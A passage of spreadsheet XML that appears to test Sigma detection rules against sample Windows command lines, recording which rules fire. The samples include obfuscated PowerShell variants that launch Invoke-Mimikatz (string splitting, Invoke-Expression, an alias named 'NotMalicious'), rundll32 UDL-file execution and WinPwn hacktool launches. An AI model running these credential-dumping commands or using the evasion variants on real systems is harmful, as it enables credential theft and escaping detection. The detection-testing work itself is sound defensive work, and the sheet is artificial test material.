      <c r="H2807" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2807" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2807" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2807" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2808" ht="15.75" customHeight="1" s="42">
      <c r="A2808" s="44" t="n"/>
      <c r="B2808" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2808" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2808" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2808" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmaNd "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2808" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2808" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2808" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2808" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2808" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2809" ht="15.75" customHeight="1" s="42">
      <c r="A2809" s="44" t="n"/>
      <c r="B2809" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2809" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2809" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2809" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComManD "$part1 = 'Invoke-'; $part2 = 'Mimikatz'; $cmd = $part1 + $part2; iex $cmd"</t>
        </is>
      </c>
      <c r="F2809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2809" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2809" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2809" s="43" t="inlineStr">
        <is>
          <t>HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d); HackTool - Mimikatz Execution (a642964e-bead-4bed-8910-1bb4d63e3b4d)</t>
        </is>
      </c>
      <c r="J2809" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2809" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2810" ht="15.75" customHeight="1" s="42">
      <c r="A2810" s="44" t="n"/>
      <c r="B2810" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2810" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2810" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2810" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2810" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2810" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2810" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2811" ht="15.75" customHeight="1" s="42">
      <c r="A2811" s="44" t="n"/>
      <c r="B2811" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2811" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2811" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2811" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmAnd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2811" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2811" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2811" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2812" ht="15.75" customHeight="1" s="42">
      <c r="A2812" s="44" t="n"/>
      <c r="B2812" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2812" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2812" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2812" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2812" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2812" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2812" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2813" ht="15.75" customHeight="1" s="42">
      <c r="A2813" s="44" t="n"/>
      <c r="B2813" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2813" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2813" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2813" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAND "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2813" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2813" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2813" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2814" ht="15.75" customHeight="1" s="42">
      <c r="A2814" s="44" t="n"/>
      <c r="B2814" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2814" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2814" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2814" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmANd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2814" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2814" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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4" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2814" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2815" ht="15.75" customHeight="1" s="42">
      <c r="A2815" s="44" t="n"/>
      <c r="B2815" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2815" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2815" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2815" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMaNd "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2815" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2815" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2815" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2816" ht="15.75" customHeight="1" s="42">
      <c r="A2816" s="43" t="n"/>
      <c r="B2816" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2816" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2816" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2816" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Invoke-Mimikatz"</t>
        </is>
      </c>
      <c r="F2816" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2816" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2816" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2817" ht="15.75" customHeight="1" s="42">
      <c r="A2817" s="43" t="n"/>
      <c r="B2817" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2817" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2817" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2817" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2817" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2817" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2817" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2818" ht="15.75" customHeight="1" s="42">
      <c r="A2818" s="43" t="n"/>
      <c r="B2818" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2818" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2818" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2818" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2818" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2818" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2818" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2819" ht="15.75" customHeight="1" s="42">
      <c r="A2819" s="43" t="n"/>
      <c r="B2819" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2819" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2819" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2819" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmAnd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2819" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2819" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I281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19" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2819" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2820" ht="15.75" customHeight="1" s="42">
      <c r="A2820" s="43" t="n"/>
      <c r="B2820" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2820" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2820" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2820" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ComMAnD "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2820" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2820" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2820" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2821" ht="15.75" customHeight="1" s="42">
      <c r="A2821" s="43" t="n"/>
      <c r="B2821" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2821" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2821" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2821" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMand "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2821" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2821" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2821" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2822" ht="15.75" customHeight="1" s="42">
      <c r="A2822" s="43" t="n"/>
      <c r="B2822" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2822" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2822" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2822" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2822" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2822" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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2" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2822" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2823" ht="15.75" customHeight="1" s="42">
      <c r="A2823" s="43" t="n"/>
      <c r="B2823" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2823" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2823" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2823" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMANd "$c = 'Invoke-Mimikatz'; Invoke-Expression $c"</t>
        </is>
      </c>
      <c r="F2823" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2823" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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3" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2823" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2824" ht="15.75" customHeight="1" s="42">
      <c r="A2824" s="43" t="n"/>
      <c r="B2824" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2824" s="43" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2824" s="43" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2824" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2824" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2824" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I282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4" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2824" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2825" ht="15.75" customHeight="1" s="42">
      <c r="A2825" s="44" t="n"/>
      <c r="B2825" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2825" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2825" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2825" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2825" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2825" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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5" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2825" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2826" ht="15.75" customHeight="1" s="42">
      <c r="A2826" s="44" t="n"/>
      <c r="B2826" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2826" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2826" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2826" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmmand "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2826" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2826" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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6" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2826" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2827" ht="15.75" customHeight="1" s="42">
      <c r="A2827" s="44" t="n"/>
      <c r="B2827" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2827" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2827" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2827" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmaND "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2827" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2827" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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7" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2827" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2828" ht="15.75" customHeight="1" s="42">
      <c r="A2828" s="44" t="n"/>
      <c r="B2828" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2828" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2828" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2828" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -command "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2828" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2828" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I28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8" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2828" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2829" ht="15.75" customHeight="1" s="42">
      <c r="A2829" s="44" t="n"/>
      <c r="B2829" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2829" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2829" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2829" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmanD "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2829" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2829" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I282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29" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2829" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2830" ht="15.75" customHeight="1" s="42">
      <c r="A2830" s="44" t="n"/>
      <c r="B2830" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_malicious_cmdlets</t>
        </is>
      </c>
      <c r="C2830" s="44" t="inlineStr">
        <is>
          <t>Malicious PowerShell Commandlets - ProcessCreation</t>
        </is>
      </c>
      <c r="D2830" s="44" t="inlineStr">
        <is>
          <t>02030f2f-6199-49ec-b258-ea71b07e03dc</t>
        </is>
      </c>
      <c r="E2830" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMmaNd "Set-Alias -Name 'NotMalicious' -Value 'Invoke-Mimikatz'; NotMalicious"</t>
        </is>
      </c>
      <c r="F2830" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2830" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I283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30" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2830" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2831" ht="15.75" customHeight="1" s="42">
      <c r="A2831" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B2831" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C2831" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D2831" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E2831" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F2831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2831" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2831" s="43" t="n"/>
      <c r="J2831" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2831" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2832" ht="15.75" customHeight="1" s="42">
      <c r="A2832" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B2832" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C2832" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D2832" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E2832" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F2832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2832" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2832" s="44" t="n"/>
      <c r="J2832" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2832" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2833" ht="15.75" customHeight="1" s="42">
      <c r="A2833" s="44" t="inlineStr">
        <is>
          <t>t1071</t>
        </is>
      </c>
      <c r="B2833" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C2833" s="44" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D2833" s="44" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E2833" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F2833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2833" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2833" s="44" t="n"/>
      <c r="J2833" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2833" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2834" ht="15.75" customHeight="1" s="42">
      <c r="A2834" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2834" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2834" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2834" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2834" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F2834" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G2834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2834" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2834" s="44" t="n"/>
      <c r="J2834" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2834" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2835" ht="15.75" customHeight="1" s="42">
      <c r="A2835" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2835" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2835" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2835" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E2835" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F2835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2835" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2835" s="44" t="n"/>
      <c r="J2835" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2835" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2836" ht="15.75" customHeight="1" s="42">
      <c r="A2836" s="44" t="inlineStr">
        <is>
          <t>t1082</t>
        </is>
      </c>
      <c r="B2836" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C2836" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D2836" s="44" t="inlineStr">
        <is>
